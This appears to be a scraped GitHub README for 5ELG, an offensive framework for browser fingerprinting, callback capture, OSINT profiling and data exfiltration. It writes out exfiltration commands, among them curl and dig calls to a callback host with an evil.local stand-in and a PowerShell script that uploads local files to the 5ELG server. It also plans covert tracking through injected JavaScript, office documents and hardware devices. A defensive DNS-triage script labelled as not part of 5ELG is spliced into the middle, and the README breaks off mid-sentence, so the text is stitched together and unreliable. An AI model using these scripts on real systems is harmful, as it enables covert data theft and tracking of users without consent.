
5ELG

5ELG is a browser fingerprinting tool designed to collect and analyze data about a user's browser and environment through various modules called "dealers."


5ELG - bro5er dEaL finGerprinter

5ELG is a useful client-side utilities framework that combines browser fingerprinting, request callbacks, and OSINT tooling, designed for cybersecurity professionals and enthusiasts. It captures detailed browser and system information, facilitates client-side exploitation testing, and supports OSINT operations through API integrations.

With a modular architecture, 5ELG combines fingerprinting, callback servers, file exfiltration, and OSINT functionalities, making it a powerful tool for security audits and offensive operations.

Overview

✔️ OSINT Automation: Integrates APIs like Shodan, VirusTotal, WHOIS, and IPINFO to gather actionable intelligence on IPs and devices.
✔️ Callback Server: Captures requests via HTTP(S), WebSockets, DNS, and ICMP, enabling testing for SSRF, blind RCE, and XXE vulnerabilities.
✔️ Browser Fingerprinting: Generates unique browser/device fingerprints and collects comprehensive user environment data.
✔️ File Exfiltration: Allows secure file uploads for testing data leakage scenarios.
✔️ Custom Dealers: Modular backend components for managing requests and data collection across diverse platforms (web, PowerShell, hardware).

Installation

  1. Clone the Repository

    git clone https://github.com/jomoza/5ELG.git
    cd 5ELG
    
  2. Install Dependencies

    npm install
    
  3. Set Up Environment Variables
    Create a .env file with your API keys and configuration settings:

    SHODAN_API_KEY=your_shodan_key
    VIRUSTOTAL_API_KEY=your_virustotal_key
    IPINFO_API_KEY=your_ipinfo_key
    PORT=8080
    
  4. Start the Server

    npm start
    

Configuration

.env File

Configure the following variables:

SHODAN_API_KEY=your_shodan_key
VIRUSTOTAL_API_KEY=your_virustotal_key
IPINFO_API_KEY=your_ipinfo_key
PORT=8080

5ELG WEB PANEL

Callback Server

The callback server in 5ELG provides a powerful mechanism for observing and capturing outbound traffic generated by vulnerable or misconfigured systems. By leveraging protocols like HTTP and DNS, we can exfiltrate valuable data during penetration testing or simulate real-world exploitation scenarios.

The callback server supports multiple protocols, including:

  • HTTP(S): Analyze headers, methods, and request bodies.
  • WebSockets: Capture persistent communications.
  • DNS and ICMP: Handle stealthy callbacks for advanced testing.

Browser Fingerprinting

  • Captures detailed browser and system attributes:
    • Plugins, device properties, GPU model, media devices, local IP, permissions...
  • Includes NoScript Tracking for users with disabled JavaScript.
  • Combines data to create a unique fingerprint using SHA256 hashing.

OSINT

🕵️ Automated OSINT for IPs

  • Integrates APIs like IPINFO, WHOIS, Shodan, VirusTotal, CriminalIP, and more.
  • Collects geolocation, service details, reputation scores, and threat intelligence.
  • Correlates OSINT data with fingerprints for a comprehensive profile.

DATA EXFILTRATION

Data exfiltration through various protocols using a callback server, as well as file reception via HTTP(S), are methods for receiving information from a client in multiple forms. This includes both exfiltrated information within the request and files from a device.

HTTP Data Exfiltration

HTTP is one of the most common ways to leak information from a target. By embedding sensitive data into HTTP headers or URL parameters, an attacker can extract valuable information when the target makes outbound requests to the callback server. Here's an example:

Exfiltrating Data via HTTP

curl -I "http://5elg.host/dealer/anyname.png?data=leak-url" \
  -H "user-agent: leak-ua" \
  -H "referer: data-leak-ref" \
  -H "Origin: data-leak-org"

USING WEBSOCKETS (EXAMPLE W/ WSCAT)

WebSockets are enabled for both user fingerprinting and callback, allowing for data exfiltration. In the near future, they will also support file exfiltration.

wscat -c ws://10.13.37.40/leak-path -o "LEAK-HEADER" -H "User-Agent: leak-ws-ua"
Connected (press CTRL+C to quit)
< DEALED!
>

FILE EXFILTRATION USING HTTP SERVICE

The HTTP service allows for the upload of one or multiple files to the 5ELG system using an ID parameter that acts as an identifier for the machine. This functionality can be utilized for various purposes, such as data collection, remote diagnostics, or system monitoring.

Here is an example of how to use PowerShell to send files to the 5ELG system:

$FilePath = "<PATH_TO_FILE>" #HERE THE FILEPATH
$ID = "<FILE-FINGERPRINT-ID>" #HERE THE ID (FOLDER NAME)
$Url = "http://<5ELG-HOST>/api/upload"
$Form = @{
    file = Get-Item -Path $FilePath
    ID = $ID
}
$boundary = [System.Guid]::NewGuid().ToString()
# ISO-8859-1 maps bytes 0-255 to characters one-to-one, so binary file content
# survives being placed in a string and converted back to bytes.
$enc = [System.Text.Encoding]::GetEncoding("ISO-8859-1")
$bodyLines = @()
foreach ($key in $Form.Keys) {
    $bodyLines += "--$boundary"
    if ($Form[$key] -is [System.IO.FileInfo]) {
        # File part: headers, blank line, then the raw file content
        $file = $Form[$key]
        $bodyLines += "Content-Disposition: form-data; name=`"$key`"; filename=`"$($file.Name)`""
        $bodyLines += "Content-Type: application/octet-stream"
        $bodyLines += ""
        $bodyLines += $enc.GetString([System.IO.File]::ReadAllBytes($file.FullName))
    } else {
        # Plain form field
        $bodyLines += "Content-Disposition: form-data; name=`"$key`""
        $bodyLines += ""
        $bodyLines += $Form[$key]
    }
}
$bodyLines += "--$boundary--"
$body = $enc.GetBytes($bodyLines -join "`r`n")
$authHeader = "Basic " + [Convert]::ToBase64String([Text.Encoding]::ASCII.GetBytes("5elg_username:5elg_password")) #CHANGE AUTH!
Invoke-WebRequest -Uri $Url -Method Post -Body $body -ContentType "multipart/form-data; boundary=$boundary" -Headers @{ Authorization = $authHeader }

DNS Data Exfiltration

DNS is a stealthier method for leaking data, as DNS queries are often allowed even in restricted environments. By encoding sensitive information into DNS queries, an attacker can exfiltrate data without relying on HTTP or other high-level protocols.

Example: Exfiltrating Data via DNS

dig @5elg.host LEAKDATA.evil.local TXT
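
On the monitoring side, a query like the one above stands out in DNS logs in three ways: it goes to a resolver other than the approved one, it can carry long encoded labels, and chunked data produces many distinct subdomains under one zone. The following JavaScript is an added example, not part of 5ELG; the log record shape, thresholds, resolver address and sample queries are assumptions constructed for illustration.

```javascript
// Added example (not 5ELG code): defensive triage of DNS query logs. All values are constructed.
const APPROVED_RESOLVERS = new Set(["10.0.0.53"]); // assumption: the internal resolver

// Shannon entropy in bits per character; encoded data scores higher than words.
function entropy(s) {
  const counts = {};
  for (const ch of s) counts[ch] = (counts[ch] || 0) + 1;
  return Object.values(counts).reduce((h, n) => h - (n / s.length) * Math.log2(n / s.length), 0);
}

// Assumption: the zone is the last two labels; use the Public Suffix List in production.
function splitName(qname) {
  const labels = qname.toLowerCase().replace(/\.$/, "").split(".");
  return { sub: labels.slice(0, -2), zone: labels.slice(-2).join(".") };
}

// Returns one finding per zone that shows at least one exfiltration signal.
function triage(queries, { minLabelLen = 20, minEntropy = 3.5, minUnique = 3 } = {}) {
  const zones = new Map();
  for (const q of queries) {
    const { sub, zone } = splitName(q.qname);
    const z = zones.get(zone) || { zone, unique: new Set(), reasons: new Set() };
    zones.set(zone, z);
    if (sub.length) z.unique.add(sub.join("."));
    // Signal 1: the client bypassed the approved resolver (what `dig @host` does).
    if (!APPROVED_RESOLVERS.has(q.server)) z.reasons.add("unapproved-resolver");
    // Signal 2: a long, high-entropy label that looks like an encoded payload.
    if (sub.some((l) => l.length >= minLabelLen && entropy(l) >= minEntropy)) z.reasons.add("encoded-label");
  }
  const findings = [];
  for (const z of zones.values()) {
    // Signal 3: many distinct subdomains under one zone (data split into chunks).
    if (z.unique.size >= minUnique) z.reasons.add("many-unique-subdomains");
    if (z.reasons.size) findings.push({ zone: z.zone, reasons: [...z.reasons].sort() });
  }
  return findings;
}

// Constructed sample log; `server` is the resolver the client sent the query to.
const SAMPLE = [
  { client: "10.0.4.17", server: "10.0.0.53", qname: "www.example.com", qtype: "A" },
  { client: "10.0.4.17", server: "10.0.0.53", qname: "mail.example.com", qtype: "MX" },
  { client: "10.0.4.22", server: "203.0.113.9", qname: "LEAKDATA.evil.local", qtype: "TXT" },
  { client: "10.0.4.30", server: "10.0.0.53", qname: "4a7f9c2e81b3d65f0a9e7c4d2b18.t.example.net", qtype: "TXT" },
  { client: "10.0.4.30", server: "10.0.0.53", qname: "0b5d8e1f7a3c9264e0d7b1a5c38f.t.example.net", qtype: "TXT" },
  { client: "10.0.4.30", server: "10.0.0.53", qname: "9e2a6c0f4b8d1735a9c2e6f0b4d8.t.example.net", qtype: "TXT" },
];

console.log(triage(SAMPLE));
```

The short `LEAKDATA` label is caught only by the resolver check, which is why blocking or alerting on outbound port 53 to anything but the approved resolvers matters. The unique-subdomain signal also fires on some CDNs and telemetry services, so tune the thresholds against a baseline before alerting on it.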

DEALERS

Many of these dealers are still in the development phase and may not function perfectly. We are more than happy to receive your issues or ideas for new dealers, as well as suggestions for improvements or changes to existing ones. Your feedback is invaluable in helping us refine and expand the project to better meet the needs of the community.

The "merca", which refers to the JavaScript we inject to interact with the dealers, contains a variable called dealer_uri. This variable should be set to the URL of the DEALER. By doing so, regardless of whether the dealers are hosted on the same site or not, they can communicate seamlessly. This approach enhances the flexibility and reach of the project, allowing for more diversified actions.

JAVASCRIPT CONFIGURATION

<script>
      //DEALER_CLIENT_SIDE_CONFIG
	let velghost = "127.0.0.1"; // IP TO 5ELG FOR WS REQUEST
	let dealerUri = "/dealer.php"; // DEALER PATH, URL OR ONLY PATH
</script>

The dealer's backend can be hosted on a separate server and requires certain variables to be configured. These variables have the same names across all examples, regardless of the programming language being used.

PHP EXAMPLE

<?php
    $DEALER_NAME="PHP.DEALER"; //DEALER_NAME_IN_DASHBOARD
    $MODE="SENDER"; //SAVER or SENDER //DEALER_MODE    
    $URI_REZ="http://5elg.site:PORT/reciver"; //5ELG RECIVER URL IF SENDER	
    $PATH_WRITER="/tmp/out.csv";  //5ELG CSV URL IF SAVER
?>

JSP EXAMPLE

<%
	String DEALER_NAME = "JSP.DEALER"; 
	String MODE = "SENDER"; 
	String PATH_WRITER = "/tmp/out.csv";
	String URI_REZ = "http://5elg.site:PORT/reciver";
%>

ASP EXAMPLE

<%
    DEALER_NAME = "ASP.DEALER"
    MODE = "SENDER"
    PATH_WRITER = "C:\temp\out.csv"
    URI_REZ = "http://5elg.site:PORT/reciver"
%>

OFIMATIC DEALER

Additionally, we are considering the possibility of creating office-based DEALERS, such as DOCX, XLSX, and PDF files. These files would incorporate scripts or embedded resources that can trigger the browser in the background to capture and send requests. This opens up a wide range of possibilities for collecting data in more discreet and creative ways. By embedding tracking mechanisms directly into common office documents, we can execute actions like fingerprinting without relying solely on traditional web-based environments. These office-based DEALERS provide an innovative approach to expanding the scope of data collection and interaction, making the system more versatile and adaptable to different contexts.

POWERSHELL DEALER

This same approach can be integrated into Bash scripts, PowerShell, and many other operating system functions that support JavaScript execution. By leveraging the flexibility of these scripting environments, we can execute fingerprinting and data collection processes seamlessly across various platforms.

HARDWARE DEALER

Finally, it’s possible to configure devices, such as Arduinos or Flipper Zeros, to force these requests as well. These devices can be programmed to interact with the dealers, triggering the collection of data from target systems in a more covert manner. This expands the versatility of the

GitHub Stars: 22
Category: Design
Updated: 6mo ago
Forks: 0
Languages: JavaScript
Security Score: 72/100 (audited on Sep 11, 2025; no findings)